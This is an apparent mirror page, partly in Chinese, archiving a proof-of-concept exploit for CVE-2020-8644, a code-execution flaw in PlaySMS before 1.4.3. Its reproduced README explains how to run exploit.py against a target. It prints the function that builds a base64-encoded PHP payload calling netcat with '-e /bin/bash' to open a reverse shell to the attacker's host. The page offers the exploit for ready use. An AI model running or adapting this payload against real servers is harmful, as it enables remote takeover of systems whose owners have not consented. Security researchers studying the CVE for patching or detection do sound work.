CVE-2020-8644 PoC — PlaySMS 输入验证错误漏洞

Source

https://github.com/H3rm1tR3b0rn/CVE-2020-8644-PlaySMS-1.4

Associated Vulnerability

Title:PlaySMS 输入验证错误漏洞 (CVE-2020-8644)
Description:PlaySMS 1.4.3之前版本中存在输入验证错误漏洞，该漏洞源于程序没有清理恶意的字符串。攻击者可利用该漏洞执行任意代码。

Description

Python script to exploit PlaySMS before 1.4.3

Readme

# CVE-2020-8644-PlaySMS-1.4
Python script to exploit PlaySMS before 1.4.3

## Execution

Open a port on your machine:

![Open port with nc](/img/nc.png)

And the execute exploit.py:

![Execution](/img/execution.png)

```
./exploit.py <target-ip> <target-port> <your-ip> <your-open-port>
```

## Changing the exploit

Tou may want to change the reverse shell created by exploit.py

To do this, you can change the function ```create_revshell_encoded``` on lines 14 to 19 of exploit.py:

```
def create_revshell_encoded(lhost,lport):
    # Change if you need
    revshell = "/*<?php /**/ system('/bin/nc.traditional "+lhost + " " + lport + " -e /bin/bash');"
    revshell_encoded = base64_encode(revshell)
    revshell_encoded = revshell_encoded.split('=')[0]
    return revshell_encoded
```

This code was developed to exploit a specific scenario where the target machine had ```/bin/nc.traditional``` available.

File Snapshot


 [4.0K]  /data/pocs/3c792c22357540edfa062ae0b8f8018d78ddbacc
├── [3.0K]  exploit.py
├── [4.0K]  img
│   ├── [ 53K]  execution.png
│   └── [ 13K]  nc.png
└── [ 911]  README.md

1 directory, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!